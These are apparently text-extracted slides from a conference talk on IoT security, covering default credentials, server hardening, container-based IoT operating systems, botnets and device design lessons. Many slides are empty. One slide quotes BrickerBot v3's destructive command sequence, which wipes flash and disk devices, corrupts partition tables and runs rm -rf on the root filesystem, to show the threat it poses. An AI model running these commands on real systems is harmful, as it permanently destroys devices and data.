No content

Internet of Shit The ”S” in “IoT” stands for ”Security” 

I’m: - Andy - Dev-like - Sec-ish - Ops-y 

No content

Viktor (@vpetersson) ● Entrepreneur, geek, tinkerer ● Jack-of-all-trades ● Cofounder of ○ Screenly (screenly.io) ○ WoTT (wott.io) ○ (and a few other things) 

What’s WoTT? ● Enable DevSecOps ● Gamify security ● Provide visibility and alerting ● Started in IoT, now on edge devices and servers 

© xkcd The sad state of ”smart” devices 

“The Internet of Things is a science project focused on creating the most complex way possible of turning the lights on.” @domguinard 

No content

No content

No content

No content

No content

No content

No content

No content

https://www.theregister.co.uk/2016/03/25/vnc_roulette/ https://www.tomsguide.com/us/pictures-story/748-vnc-roulette-slideshow.html#s12 

What This Talk is About ● IoT: The State of the Art ● How Containers and Kernel Technologies Can Help ● Botnets and Brickerbots ● Building Better Devices 

IoT: The State of the Art 

https://www.wired.com/2016/08/jeep-hackers-return-high-speed-steering-acceleration-hacks/ ● 

http://money.cnn.com/2017/01/09/technology/fda-st-jude-cardiac-hack/ 

No content

No content

No content

No content

No content

No content

How We Think IoT Devices Run 

How IoT Devices Actually Run 

No content

Blockchain all da thingz! 

Why do IoT devices get compromised? ● Default credentials ● Poor, or non-existent, update cycles ● Insecure services exposed to the network (telnet, ftp, etc) ● No isolation or hardening ● Manufacturers not using common sense 

IoT Devices vs Servers ● IoT devices are getting more powerful ● More and more are running Linux ○ Except many battery-powered devices ● This means we are deploying general purpose computers into...everything ○ Moore’s law at play ● ...the line is getting blurry between IoT and traditional compute 

Securing Servers 101 ● What services are running? ○ Do we need all of them? ○ Are any of them publicly exposed on the network? ● Is everything configured with least privilege? ● Are we using process isolation to limit the blast radius of a breach? ● Is everything encrypted in transit? At rest? ● Is the firewall configured? ● Are there any packages installed with known vulnerabilities? ● Are we conformant to documented best practice (CIS, OWASP, et. al.)? ● How do we monitor if any of this changes? 

Securing IoT Devices 101 

Sham eless self-plug 

Containers and IoT 

Containers to the Rescue! Containers to the Rescue! 

Modern IoT Operating Systems 

● “git push master balena” ● Application isolated ● Isolation tool: Docker/BalenaEngine 

No content

● Smaller footprint than “Classic” ● Lots of “read-only” and kernel magic ● Interfaces, slots and plugs ● Snaps, Docker and LXD ● Self-updating ● Isolation tool (primary): AppArmor 

No content

● Everything is a “snap” (including the OS) ● Transactional, cryptographically signed, updates ● Default permission is nill (or almost) ● Permission must be granted explicitly ○ E.g. network access, ports etc 

- Trusted Domain https://developer.ubuntu.com/static/resources/ubuntu-core-16-security-whitepaper.pdf 

https://www.networkworld.com/article/3128372/internet-of-things/ddos-at tacks-using-iot-devices-follow-the-manchurian-candidate-model.html 

No content

# BrickerBot v3 device logic $ busybox cat /dev/urandom >/dev/mtdblock0 & $ busybox cat /dev/urandom >/dev/sda & $ busybox cat /dev/urandom >/dev/mtdblock10 & $ busybox cat /dev/urandom >/dev/mmc0 & $ busybox cat /dev/urandom >/dev/sdb & $ busybox cat /dev/urandom >/dev/ram0 & $ busybox cat /dev/urandom >/dev/mtd0 & $ busybox cat /dev/urandom >/dev/mtd1 & $ busybox cat /dev/urandom >/dev/mtdblock1 & $ busybox cat /dev/urandom >/dev/mtdblock2 & $ busybox cat /dev/urandom >/dev/mtdblock3 & $ fdisk -C 1 -H 1 -S1 /dev/mtd0 w $ fdisk -C 1 -H 1 -S1 /dev/mtd1 w $ fdisk -C 1 -H 1 -S1 /dev/sda w $ fdisk -C 1 -H 1 -S1 /dev/mtdblock0 w $ route del default;iproute del default;ip route del default; rm -rf /* 2>/dev/null & sysctl -w net.ipv4.tcp_timestamps=0;sysctl -w kernel.threads-max=1 $ halt -n -f $ reboot 

How do we get vendors to give a shit? 

Defence Against the Dark Botnets 

No content

No content

No content

No content

IPv6 IPv6 

IPv6 

Building Better IoT Devices 

No content

Device life cycle 

Common mistakes 

Designing Better IoT Devices 

Lessons learned from Screenly 

Screenly 1 Player + + + + 

Screenly 2 Player criteria ● Disk images built on CI ● Process isolation (perhaps using containers) ● Transactional updates (app and OS) ○ Automatic roll-back ● Not having to manage the OS layer ourselves ○ Must be locked down/Hardened by default ● Bonus: Cryptographically signed updates 

Screenly 2 Player + + 

Recap 

Conclusion ● Everything is now a computer ○ Whatever that means... ● IoT security is an afterthought at best ● The new breed of containerised IoT platforms greatly enhance the update and security story ● This problem is bigger than all of us: legislation, class action, or revolt is required! This should be supported by financial incentives ● We can fix life cycle and runtime security ● Go forth and patch your devices! 

@sublimino @controlplaneio @vpetersson @wottsecurity